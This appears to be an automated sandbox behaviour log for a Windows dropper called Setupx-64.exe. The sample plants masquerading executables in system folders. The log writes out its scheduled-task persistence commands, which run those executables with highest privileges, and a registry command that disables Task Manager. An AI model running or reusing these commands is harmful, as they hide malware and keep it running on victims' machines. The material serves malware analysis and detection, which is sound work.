Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008D0F78	0_2_008D0F78
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Code function: 4_2_00007FF7C8183585	4_2_00007FF7C8183585
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8173585	20_2_00007FF7C8173585
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C818D1F8	20_2_00007FF7C818D1F8
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C83F3345	20_2_00007FF7C83F3345
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C840EA6E	20_2_00007FF7C840EA6E
Source: C:\Recovery\fontdrvhost.exe	Code function: 21_2_00007FF7C8183585	21_2_00007FF7C8183585
Source: C:\Recovery\fontdrvhost.exe	Code function: 22_2_00007FF7C8183585	22_2_00007FF7C8183585
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Code function: 25_2_00007FF7C8183585	25_2_00007FF7C8183585
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Code function: 26_2_00007FF7C8153585	26_2_00007FF7C8153585

Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: String function: 008CE28C appears 35 times
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: String function: 008CE360 appears 52 times
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: String function: 008CED00 appears 31 times

Source: Blockruntime.exe.0.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RZctPlhC2XmeDKsE7v.exe.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: StartMenuExperienceHost.exe.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: RuntimeBroker.exe.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: upfc.exe.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
Source: fontdrvhost.exe.4.dr	Static PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970

Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Mutant created: NULL
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\57c3278637fca07d7836ae950d8b7c9bb380e11f
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7428:120:WilError_03

Source: C:\Users\user\Desktop\Setupx-64.exe	Command line argument: sfxname	0_2_008CD5D4
Source: C:\Users\user\Desktop\Setupx-64.exe	Command line argument: sfxstime	0_2_008CD5D4
Source: C:\Users\user\Desktop\Setupx-64.exe	Command line argument: STARTDLG	0_2_008CD5D4

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Program Files (x86)\Google\Update\upfc.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: unknown	Process created: C:\Users\user\Desktop\Setupx-64.exe "C:\Users\user\Desktop\Setupx-64.exe"
Source: C:\Users\user\Desktop\Setupx-64.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe"
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComcontainerruntimeCrtNet\kFuzdYrWw7.bat" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ComcontainerruntimeCrtNet\Blockruntime.exe "C:\ComcontainerruntimeCrtNet\Blockruntime.exe"
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\google\Update\upfc.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Recovery\fontdrvhost.exe'" /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Recovery\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Recovery\fontdrvhost.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RZctPlhC2XmeDKsE7vR" /sc MINUTE /mo 7 /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RZctPlhC2XmeDKsE7v" /sc ONLOGON /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RZctPlhC2XmeDKsE7vR" /sc MINUTE /mo 8 /tr "'C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe'" /rl HIGHEST /f
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Program Files (x86)\Google\Update\upfc.exe "C:\Program Files (x86)\google\Update\upfc.exe"
Source: unknown	Process created: C:\Recovery\fontdrvhost.exe C:\Recovery\fontdrvhost.exe
Source: unknown	Process created: C:\Recovery\fontdrvhost.exe C:\Recovery\fontdrvhost.exe
Source: unknown	Process created: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe
Source: unknown	Process created: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
Source: C:\Users\user\Desktop\Setupx-64.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ComcontainerruntimeCrtNet\0U7uHZW.vbe"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ComcontainerruntimeCrtNet\kFuzdYrWw7.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\ComcontainerruntimeCrtNet\Blockruntime.exe "C:\ComcontainerruntimeCrtNet\Blockruntime.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Process created: C:\Program Files (x86)\Google\Update\upfc.exe "C:\Program Files (x86)\google\Update\upfc.exe"	Jump to behavior

Source: Setupx-64.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Setupx-64.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Setupx-64.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Setupx-64.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Setupx-64.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Setupx-64.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Setupx-64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Setupx-64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Setupx-64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Setupx-64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Setupx-64.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008CE28C push eax; ret	0_2_008CE2AA
Source: C:\Users\user\Desktop\Setupx-64.exe	Code function: 0_2_008CED46 push ecx; ret	0_2_008CED59
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8186A04 push ds; retf 0017h	20_2_00007FF7C8186A05
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8405159 push eax; retf	20_2_00007FF7C840515F
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C83F7967 push ebx; retf	20_2_00007FF7C83F796A
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C84069FE push eax; retf	20_2_00007FF7C84069FF
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C84069B3 push eax; retf	20_2_00007FF7C84069B4
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C840623A push eax; retf	20_2_00007FF7C840623E
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406A50 push eax; retf	20_2_00007FF7C8406A57
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406AEE push eax; retf	20_2_00007FF7C8406AEF
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406B95 push eax; retf	20_2_00007FF7C8406B99
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406BE3 push eax; retf	20_2_00007FF7C8406BE7
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406C4A push eax; retf	20_2_00007FF7C8406C51
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406CF1 push eax; retf	20_2_00007FF7C8406CF2
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C84064E7 push eax; retf	20_2_00007FF7C84064E8
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C840650E push eax; retf	20_2_00007FF7C840650F
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406D0A push eax; retf	20_2_00007FF7C8406D0E
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C84065DF push eax; retf	20_2_00007FF7C84065E0
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406DFA push eax; retf	20_2_00007FF7C8406DFB
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406E69 push eax; retf	20_2_00007FF7C8406E6A
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C84066E7 push eax; retf	20_2_00007FF7C84066EC
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406704 push eax; retf	20_2_00007FF7C8406708
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406EB4 push eax; retf	20_2_00007FF7C8406EB8
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8405786 push eax; retf	20_2_00007FF7C8405797
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C84067E4 push eax; retf	20_2_00007FF7C84067EE
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C84057E0 push eax; retf	20_2_00007FF7C84057E1
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8405804 push eax; retf	20_2_00007FF7C8405805
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406812 push eax; retf	20_2_00007FF7C840681B
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C84057AF push eax; retf	20_2_00007FF7C84057B8
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8405FAB push eax; retf	20_2_00007FF7C8405FAC
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Code function: 20_2_00007FF7C8406833 push eax; retf	20_2_00007FF7C8406837

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\Windows\PolicyDefinitions\en-US\StartMenuExperienceHost.exe	Jump to dropped file
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Jump to dropped file
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\Recovery\fontdrvhost.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Setupx-64.exe	File created: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Jump to dropped file
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\Windows\Speech\Engines\TTS\en-US\RuntimeBroker.exe	Jump to dropped file
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	File created: C:\Program Files (x86)\Google\Update\upfc.exe	Jump to dropped file

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Memory allocated: D90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Memory allocated: 1AC00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Memory allocated: 13F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Memory allocated: 1B220000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Recovery\fontdrvhost.exe	Memory allocated: AF0000 memory reserve \| memory write watch
Source: C:\Recovery\fontdrvhost.exe	Memory allocated: 1A800000 memory reserve \| memory write watch
Source: C:\Recovery\fontdrvhost.exe	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Recovery\fontdrvhost.exe	Memory allocated: 1AA80000 memory reserve \| memory write watch
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Memory allocated: 1120000 memory reserve \| memory write watch
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Memory allocated: 1AC10000 memory reserve \| memory write watch
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Memory allocated: 1460000 memory reserve \| memory write watch
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Memory allocated: 1B2D0000 memory reserve \| memory write watch

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599901	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599452	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599234	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598796	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598139	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 598015	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 597843	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 597406	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 596922	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 596406	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 596203	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 595875	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 595727	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 595531	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 595297	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 594656	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 593281	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 593062	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 592812	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 592562	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 592265	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 591859	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 591562	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 591234	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 590812	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 589703	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 589312	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 589078	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 588750	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 588484	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 588203	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 587920	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 587562	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 586437	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 586001	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 585656	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 585453	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 585140	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 584827	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 584468	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 584307	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 584203	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 584004	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 583703	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 583390	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 583258	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 583154	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 583042	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 582935	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 582816	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 582701	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Thread delayed: delay time: 582593	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Thread delayed: delay time: 922337203685477

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Window / User API: threadDelayed 1182	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe	Window / User API: threadDelayed 752	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Window / User API: threadDelayed 4824	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe	Window / User API: threadDelayed 4753	Jump to behavior
Source: C:\Recovery\fontdrvhost.exe	Window / User API: threadDelayed 364
Source: C:\Recovery\fontdrvhost.exe	Window / User API: threadDelayed 366
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Window / User API: threadDelayed 367
Source: C:\ComcontainerruntimeCrtNet\RZctPlhC2XmeDKsE7v.exe	Window / User API: threadDelayed 370

Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe TID: 7816	Thread sleep count: 1182 > 30	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe TID: 7772	Thread sleep count: 752 > 30	Jump to behavior
Source: C:\ComcontainerruntimeCrtNet\Blockruntime.exe TID: 7752	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599901s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599781s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599671s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599562s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599452s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Google\Update\upfc.exe TID: 1408	Thread sleep time: -599343s >= -30000s	Jump to behavior
